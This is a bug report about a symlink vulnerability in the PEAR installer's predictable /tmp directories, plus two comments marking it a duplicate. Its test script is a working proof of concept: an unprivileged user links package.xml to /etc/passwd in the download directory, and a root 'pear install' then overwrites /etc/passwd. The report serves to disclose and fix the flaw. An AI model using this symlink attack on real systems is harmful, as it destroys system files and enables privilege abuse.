Description: ------------ There's symlink vulnerability when doing PEAR install. PEAR should really be using $(mktemp) for it's directories like download_dir, cache_dir and tmp_dir, and check whether the directory doesn't exists. Test script: --------------- # pear config-show | grep /tmp PEAR Installer cache directory cache_dir /tmp/pear/cache PEAR Installer download download_dir /tmp/buildd/php5-5.3.3/pear-build-download PEAR Installer temp directory temp_dir /tmp/pear/temp # ls -ld /tmp/buildd/php5-5.3.3/pear-build-download drwxr-xr-x 2 ondrej ondrej 4096 Nov 14 14:17 /tmp/buildd/php5-5.3.3/pear-build-download # su - ondrej $ cd /tmp/buildd/php5-5.3.3/pear-build-download $ ln -s /etc/passwd package.xml $ cat package.xml root:x:0:0:root:/root:/bin/bash [...] $ logout # pear install Net_Socket downloading Net_Socket-1.0.10.tgz ... Starting to download Net_Socket-1.0.10.tgz (5,429 bytes) .....done: 5,429 bytes install ok: channel://pear.php.net/Net_Socket-1.0.10 # head /etc/passwd <?xml version="1.0" encoding="UTF-8"?> <package packagerversion="1.9.1" version="2.0" xmlns="http://pear.php.net/dtd/package-2.0" xmlns:tasks="http://pear.php.net/dtd/tasks-1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://pear.php.net/dtd/tasks-1.0 http://pear.php.net/dtd/tasks-1.0.xsd http://pear.php.net/dtd/package-2.0 http://pear.php.net/dtd/package-2.0.xsd"> <name>Net_Socket</name> <channel>pear.php.net</channel> <summary>Network Socket Interface</summary> <description>Net_Socket is a class interface to TCP sockets. It provides blocking and non-blocking operation, with different reading and writing modes (byte-wise, block-wise, line-wise and special formats like network byte-order ip addresses).</description> <lead> Expected result: ---------------- Not overwriting system files. Not vulnerable to symlink attack. Actual result: -------------- Overwritten /etc/passwd just by creating right directories and symlinks.

Hello, This bug is marked as duplicate. But duplicate of what?

Duplicate of bug #18056.